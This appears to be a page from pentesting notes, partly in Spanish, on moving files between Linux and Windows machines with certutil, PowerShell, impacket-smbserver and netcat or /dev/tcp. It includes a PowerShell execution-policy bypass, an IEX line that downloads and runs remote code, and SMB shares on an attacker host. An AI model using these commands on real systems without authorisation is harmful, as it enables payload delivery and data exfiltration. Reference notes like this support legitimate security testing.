File Transfer

How to transfer files with Linux and Windows

Linux -> Windows

Certutil (exe)

First establish a web server with python in Linux terminal

python -m SimpleHTTPServer 8000

Now in windows execute

certutil.exe -f -urlcache -split http://<lhost>:8000/file_name file_name_output

PowerShell

First establish a web server with python in Linux terminal

python3 -m http.server

With PowerShell in cmd we have several options.

powershell -exec bypass -nop -c "(New-ObjectNet.WebClient).DownloadFile('http://<rhost>:<portwebserver>/<file>')                       
powershell IWR -uri http://<rhost>:<portwebserver>/<file> -OutFile C:\\<file_name_output>                  
powershell IEX(New-Object Net.WebClient).downloadString('http://<rhost>:<portwebserver>/<file>')

En windows crear una sesion powershell. Simplemente escribe powershell

Invoke-WebRequest http://<rhost>:<rport>/<file> -o <nombre_archivo>

impacket-smbserver

Linux

To windows 10

impacket-smbserver smbFolder $(pwd) -smb2support -username <anyuser> -password <anypw>

To other windows

impacket-smbserver smbFolder $(pwd) -username <anyuser> -password <anypw>

impacket-smbserver smbFolder $(pwd)

Windows

net use \\<rhost>\<smbFolder> /u:<anyuser> <anypw>
\\<attackerip>\<smbFolder>\<file>

Linux -> Linux

Option A

Machine to act as server and has the file:

nc -lvp 4444 < file_name

Machine where you want to save the file:

nc 192.168.1.10 4444 > file_name

Option B

Server:

nc -lvp 4444 < file_name

Receiver:

cat < /dev/tcp/192.168.1.10/4444 > file_name

Option C

Receiver:

nc -lvp 4444 > file_name

Sender:

cat file_name > /dev/tcp/192.168.1.10/4444

Validate integrity, execute it in both systems, hash needs to be the same:

md5sum file_name

Windows -> Linux

Shared folder

On Linux, we create the shared folder:

impacket-smbserver nameSharedFolder $(pwd) -smb2support

And copy file:

copy este_archivo.zip \\10.10.10.10\nameSharedFolder\con_este_nombre.zip

In case of error like this:

ERROR: The specified server cannot perform the requested operation.

We need to try with credentials:

impacket-smbserver nameSharedFolder $(pwd) -smb2support -username lanz -password lanz321

And now on Windows machine we "linked" the shared folder in a network:

net use y: \\10.10.10.10\nameSharedFolder /u:lanz lanz321
dir y:\
copy con_este_nombre.zip y:\con_este_nombre.zip
PreviousCheck System InfoNextReverse Shell

Last updated